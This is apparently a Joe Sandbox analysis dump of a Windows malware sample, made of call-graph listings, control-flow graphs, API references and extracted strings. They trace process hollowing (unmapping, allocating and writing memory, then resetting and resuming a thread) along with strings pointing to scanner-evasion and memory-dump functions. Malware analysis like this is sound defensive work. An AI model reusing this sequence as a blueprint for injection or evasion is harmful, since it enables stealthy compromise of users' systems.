ExitProcess 25972->25973 25974 2b2446c 25972->25974 25974->25973 25976 2b24143 25975->25976 25977 2b24110 25975->25977 25976->25959 25977->25976 25981 2b25814 25977->25981 25985 2b215cc 25977->25985 25980->25969 25982 2b25824 GetModuleFileNameA 25981->25982 25983 2b25840 25981->25983 25989 2b25a78 GetModuleFileNameA RegOpenKeyExA 25982->25989 25983->25977 26008 2b21560 25985->26008 25987 2b215d4 VirtualAlloc 25988 2b215eb 25987->25988 25988->25977 25990 2b25afb 25989->25990 25991 2b25abb RegOpenKeyExA 25989->25991 26007 2b258b4 12 API calls 25990->26007 25991->25990 25993 2b25ad9 RegOpenKeyExA 25991->25993 25993->25990 25994 2b25b84 lstrcpynA GetThreadLocale GetLocaleInfoA 25993->25994 25998 2b25bbb 25994->25998 25999 2b25c9e 25994->25999 25995 2b25b20 RegQueryValueExA 25996 2b25b5e RegCloseKey 25995->25996 25997 2b25b40 RegQueryValueExA 25995->25997 25996->25983 25997->25996 25998->25999 26001 2b25bcb lstrlenA 25998->26001 25999->25983 26002 2b25be3 26001->26002 26002->25999 26003 2b25c30 26002->26003 26004 2b25c08 lstrcpynA LoadLibraryExA 26002->26004 26003->25999 26005 2b25c3a lstrcpynA LoadLibraryExA 26003->26005 26004->26003 26005->25999 26006 2b25c6c lstrcpynA LoadLibraryExA 26005->26006 26006->25999 26007->25995 26009 2b21500 26008->26009 26009->25987 26010 2b4bb3c 26013 2b3ec6c 26010->26013 26014 2b3ec74 26013->26014 26014->26014 28995 2b38704 LoadLibraryW 26014->28995 26016 2b3ec96 29000 2b22ee0 QueryPerformanceCounter 26016->29000 26018 2b3ec9b 26019 2b3eca5 InetIsOffline 26018->26019 26020 2b3ecc0 26019->26020 26021 2b3ecaf 26019->26021 26023 2b24500 11 API calls 26020->26023 26022 2b24500 11 API calls 26021->26022 26024 2b3ecbe 26022->26024 26023->26024 26025 2b2480c 11 API calls 26024->26025 26026 2b3eced 26025->26026 26027 2b3ecf5 26026->26027 29003 2b24798 26027->29003 26029 2b3ed18 26030 2b3ed20 26029->26030 26031 2b3ed2a 26030->26031 29018 2b3881c 26031->29018 26034 2b2480c 11 API calls 26035 2b3ed51 26034->26035 26036 2b3ed59 26035->26036 26037 2b24798 11 API calls 26036->26037 26038 2b3ed7c 26037->26038 26039 2b3ed84 26038->26039 29031 2b246a4 26039->29031 29033 2b380c0 28995->29033 28997 2b3873d 29044 2b37cf8 28997->29044 29001 2b22ef8 GetTickCount 29000->29001 29002 2b22eed 29000->29002 29001->26018 29002->26018 29004 2b2479c 29003->29004 29005 2b247fd 29003->29005 29006 2b24500 29004->29006 29007 2b247a4 29004->29007 29008 2b24514 29006->29008 29011 2b24570 11 API calls 29006->29011 29007->29005 29010 2b24500 11 API calls 29007->29010 29013 2b247b3 29007->29013 29009 2b24542 29008->29009 29014 2b22c2c 11 API calls 29008->29014 29009->26029 29010->29013 29011->29008 29012 2b24570 11 API calls 29015 2b247cd 29012->29015 29013->29012 29014->29009 29016 2b24500 11 API calls 29015->29016 29017 2b247f9 29016->29017 29017->26029 29019 2b38830 29018->29019 29020 2b3884f LoadLibraryA 29019->29020 29080 2b2494c 29020->29080 29023 2b2494c 29024 2b38872 GetProcAddress 29023->29024 29025 2b38899 29024->29025 29026 2b37cf8 18 API calls 29025->29026 29027 2b388dd FreeLibrary 29026->29027 29028 2b388f5 29027->29028 29029 2b244d0 11 API calls 29028->29029 29030 2b38902 29029->29030 29030->26034 29032 2b246aa 29031->29032 29034 2b24500 11 API calls 29033->29034 29035 2b380e5 29034->29035 29058 2b3790c 29035->29058 29038 2b24798 11 API calls 29039 2b380ff 29038->29039 29040 2b38107 GetModuleHandleW GetProcAddress GetProcAddress 29039->29040 29041 2b3813a 29040->29041 29064 2b244d0 29041->29064 29045 2b24500 11 API calls 29044->29045 29046 2b37d1d 29045->29046 29047 2b3790c 12 API calls 29046->29047 29048 2b37d2a 29047->29048 29049 2b24798 11 API calls 29048->29049 29050 2b37d3a 29049->29050 29069 2b38018 29050->29069 29053 2b380c0 15 API calls 29054 2b37d53 NtWriteVirtualMemory 29053->29054 29055 2b37d7f 29054->29055 29056 2b244d0 11 API calls 29055->29056 29057 2b37d8c FreeLibrary 29056->29057 29057->26016 29059 2b3791d 29058->29059 29060 2b24b78 11 API calls 29059->29060 29063 2b3792d 29060->29063 29061 2b37999 29061->29038 29063->29061 29068 2b2ba3c CharNextA 29063->29068 29066 2b244d6 29064->29066 29065 2b244fc 29065->28997 29066->29065 29067 2b22c2c 11 API calls 29066->29067 29067->29066 29068->29063 29070 2b24500 11 API calls 29069->29070 29071 2b3803b 29070->29071 29072 2b3790c 12 API calls 29071->29072 29073 2b38048 29072->29073 29074 2b38050 GetModuleHandleA 29073->29074 29075 2b380c0 15 API calls 29074->29075 29076 2b38061 GetModuleHandleA 29075->29076 29077 2b3807f 29076->29077 29078 2b244ac 11 API calls 29077->29078 29079 2b37d4d 29078->29079 29079->29053 29081 2b24950 GetModuleHandleA 29080->29081 29081->29023 29082 2b24e88 29083 2b24e95 29082->29083 29087 2b24e9c 29082->29087 29091 2b24bdc SysAllocStringLen 29083->29091 29088 2b24bfc 29087->29088 29089 2b24c02 SysFreeString 29088->29089 29090 2b24c08 29088->29090 29089->29090 29091->29087 29092 2b21c6c 29093 2b21d04 29092->29093 29094 2b21c7c 29092->29094 29095 2b21f58 29093->29095 29096 2b21d0d 29093->29096 29097 2b21cc0 29094->29097 29098 2b21c89 29094->29098 29100 2b21fec 29095->29100 29104 2b21f68 29095->29104 29105 2b21fac 29095->29105 29101 2b21d25 29096->29101 29114 2b21e24 29096->29114 29102 2b21724 10 API calls 29097->29102 29099 2b21c94 29098->29099 29140 2b21724 29098->29140 29107 2b21d2c 29101->29107 29110 2b21d48 29101->29110 29116 2b21dfc 29101->29116 29122 2b21cd7 29102->29122 29108 2b21724 10 API calls 29104->29108 29111 2b21fb2 29105->29111 29112 2b21724 10 API calls 29105->29112 29106 2b21e7c 29109 2b21724 10 API calls 29106->29109 29129 2b21e95 29106->29129 29113 2b21f82 29108->29113 29115 2b21f2c 29109->29115 29119 2b21d79 Sleep 29110->29119 29120 2b21d9c 29110->29120 29132 2b21fc1 29112->29132 29134 2b21a8c 8 API calls 29113->29134 29138 2b21fa7 29113->29138 29114->29106 29118 2b21e55 Sleep 29114->29118 29114->29129 29115->29129 29133 2b21a8c 8 API calls 29115->29133 29117 2b21724 10 API calls 29116->29117 29126 2b21e05 29117->29126 29118->29106 29123 2b21e6f Sleep 29118->29123 29119->29120 29124 2b21d91 Sleep 29119->29124 29121 2b21ca1 29130 2b21cb9 29121->29130 29164 2b21a8c 29121->29164 29128 2b21a8c 8 API calls 29122->29128 29131 2b21cfd 29122->29131 29123->29114 29124->29110 29127 2b21e1d 29126->29127 29137 2b21a8c 8 API calls 29126->29137 29128->29131 29135 2b21a8c 8 API calls 29132->29135 29132->29138 29136 2b21f50 29133->29136 29134->29138 29139 2b21fe4 29135->29139 29137->29127 29141 2b21968 29140->29141 29142 2b2173c 29140->29142 29143 2b21938 29141->29143 29144 2b21a80 29141->29144 29152 2b217cb Sleep 29142->29152 29154 2b2174e 29142->29154 29148 2b21947 Sleep 29143->29148 29157 2b21986 29143->29157 29146 2b21684 VirtualAlloc 29144->29146 29147 2b21a89 29144->29147 29145 2b2175d 29145->29121 29149 2b216bf 29146->29149 29150 2b216af 29146->29150 29147->29121 29151 2b2195d Sleep 29148->29151 29148->29157 29149->29121 29181 2b21644 29150->29181 29151->29143 29152->29154 29156 2b217e4 Sleep 29152->29156 29154->29145 29155 2b2182c 29154->29155 29158 2b2180a Sleep 29154->29158 29162 2b215cc VirtualAlloc 29155->29162 29163 2b21838 29155->29163 29156->29142 29159 2b219a4 29157->29159 29160 2b215cc VirtualAlloc 29157->29160 29158->29155 29161 2b21820 Sleep 29158->29161 29159->29121 29160->29159 29161->29154 29162->29163 29163->29121 29165 2b21aa1 29164->29165 29166 2b21b6c 29164->29166 29168 2b21aa7 29165->29168 29169 2b21b13 Sleep 29165->29169 29167 2b216e8 29166->29167 29166->29168 29171 2b21c66 29167->29171 29174 2b21644 2 API calls 29167->29174 29170 2b21ab0 29168->29170 29173 2b21b4b Sleep 29168->29173 29178 2b21b81 29168->29178 29169->29168 29172 2b21b2d Sleep 29169->29172 29170->29130 29171->29130 29172->29165 29175 2b21b61 Sleep 29173->29175 29173->29178 29176 2b216f5 VirtualFree 29174->29176 29175->29168 29177 2b2170d 29176->29177 29177->29130 29179 2b21c00 VirtualFree 29178->29179 29180 2b21ba4 29178->29180 29179->29130 29180->29130 29182 2b21681 29181->29182 29183 2b2164d 29181->29183 29182->29149 29183->29182 29184 2b2164f Sleep 29183->29184 29185 2b21664 29184->29185 29185->29182 29186 2b21668 Sleep 29185->29186 29186->29183

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 6797 2b38ba8-2b38bab 6798 2b38bb0-2b38bb5 6797->6798 6798->6798 6799 2b38bb7-2b38c9e call 2b2493c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 6798->6799 6830 2b38ca4-2b38d7f call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 6799->6830 6831 2b3a6ef-2b3a759 call 2b244d0 * 2 call 2b24c0c call 2b244d0 call 2b244ac call 2b244d0 * 2 6799->6831 6830->6831 6875 2b38d85-2b390ad call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b230d4 * 2 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24d8c call 2b24d9c call 2b385d4 6830->6875 6984 2b39120-2b39441 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b22ee0 call 2b22f08 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c GetThreadContext 6875->6984 6985 2b390af-2b3911b call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 6875->6985 6984->6831 7093 2b39447-2b396aa call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b3824c 6984->7093 6985->6984 7166 2b396b0-2b39819 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b384bc 7093->7166 7167 2b399b7-2b39a22 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 7093->7167 7257 2b39843-2b398ae call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 7166->7257 7258 2b3981b-2b39841 call 2b379ac 7166->7258 7192 2b39a28-2b39ba8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b379ac 7167->7192 7193 2b39a23 call 2b3881c 7167->7193 7192->6831 7297 2b39bae-2b39ca7 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b38ab8 7192->7297 7193->7192 7266 2b398b4-2b399ab call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b379ac 7257->7266 7298 2b398af call 2b3881c 7257->7298 7258->7266 7337 2b399b0-2b399b5 7266->7337 7349 2b39cfb-2b3a453 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b37cf8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b37cf8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c SetThreadContext NtResumeThread call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b22c2c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b38798 * 3 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 7297->7349 7350 2b39ca9-2b39cf6 call 2b389b0 call 2b389a4 7297->7350 7298->7266 7337->7192 7575 2b3a458-2b3a6ea call 2b38798 * 2 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 * 5 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b37ecc call 2b38798 * 2 7349->7575 7350->7349 7575->6831
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                                                • Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                                                • Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 02B38879
                                                                                                                                • Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74F60000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74F60000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                                                • Part of subcall function 02B385D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B38660
                                                                                                                              • GetThreadContext.KERNEL32(00000900,02B81420,ScanString,02B813A4,02B3A774,UacInitialize,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,UacInitialize,02B813A4), ref: 02B3943A
                                                                                                                                • Part of subcall function 02B3824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B382BD
                                                                                                                                • Part of subcall function 02B384BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B38521
                                                                                                                                • Part of subcall function 02B379AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F
                                                                                                                                • Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                                              • SetThreadContext.KERNEL32(00000900,02B81420,ScanBuffer,02B813A4,02B3A774,ScanString,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,000008FC,00269FF8,02B814F8,00000004,02B814FC), ref: 02B3A14F
                                                                                                                              • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000900,00000000,00000900,02B81420,ScanBuffer,02B813A4,02B3A774,ScanString,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,000008FC,00269FF8,02B814F8), ref: 02B3A15C
                                                                                                                                • Part of subcall function 02B38798: LoadLibraryW.KERNEL32(bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
                                                                                                                                • Part of subcall function 02B38798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
                                                                                                                                • Part of subcall function 02B38798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                              • API String ID: 4083799063-51457883
                                                                                                                              • Opcode ID: 36e23aec3e2034290f3169f197dd8805c8134dcf0e4cab9253220f4260ee2834
                                                                                                                              • Instruction ID: a739fa68494b68729180e27db8bd6d6f415237a3fd8a7800f12e8c14729794c5
                                                                                                                              • Opcode Fuzzy Hash: 36e23aec3e2034290f3169f197dd8805c8134dcf0e4cab9253220f4260ee2834
                                                                                                                              • Instruction Fuzzy Hash: 3AE2FE35A50228DFDB12EB64CCD0ADE73BAAF55310F2045E1E14DABA14DE34AE4ACF51

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 7653 2b38ba6-2b38bab 7655 2b38bb0-2b38bb5 7653->7655 7655->7655 7656 2b38bb7-2b38c9e call 2b2493c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 7655->7656 7687 2b38ca4-2b38d7f call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 7656->7687 7688 2b3a6ef-2b3a759 call 2b244d0 * 2 call 2b24c0c call 2b244d0 call 2b244ac call 2b244d0 * 2 7656->7688 7687->7688 7732 2b38d85-2b390ad call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b230d4 * 2 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24d8c call 2b24d9c call 2b385d4 7687->7732 7841 2b39120-2b39441 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b22ee0 call 2b22f08 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c GetThreadContext 7732->7841 7842 2b390af-2b3911b call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 7732->7842 7841->7688 7950 2b39447-2b396aa call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b3824c 7841->7950 7842->7841 8023 2b396b0-2b39819 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b384bc 7950->8023 8024 2b399b7-2b39a22 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 7950->8024 8114 2b39843-2b398ae call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 8023->8114 8115 2b3981b-2b39841 call 2b379ac 8023->8115 8049 2b39a28-2b39ba8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b379ac 8024->8049 8050 2b39a23 call 2b3881c 8024->8050 8049->7688 8154 2b39bae-2b39ca7 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b38ab8 8049->8154 8050->8049 8123 2b398b4-2b399b5 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b379ac 8114->8123 8155 2b398af call 2b3881c 8114->8155 8115->8123 8123->8049 8206 2b39cfb-2b3a6ea call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b37cf8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b37cf8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c SetThreadContext NtResumeThread call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b22c2c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b38798 * 3 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b38798 * 2 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 * 5 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b37ecc call 2b38798 * 2 8154->8206 8207 2b39ca9-2b39cf6 call 2b389b0 call 2b389a4 8154->8207 8155->8123 8206->7688 8207->8206
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                                                • Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                                                • Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 02B38879
                                                                                                                                • Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74F60000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74F60000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                                                • Part of subcall function 02B385D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B38660
                                                                                                                              • GetThreadContext.KERNEL32(00000900,02B81420,ScanString,02B813A4,02B3A774,UacInitialize,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,UacInitialize,02B813A4), ref: 02B3943A
                                                                                                                                • Part of subcall function 02B3824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B382BD
                                                                                                                                • Part of subcall function 02B384BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B38521
                                                                                                                                • Part of subcall function 02B379AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
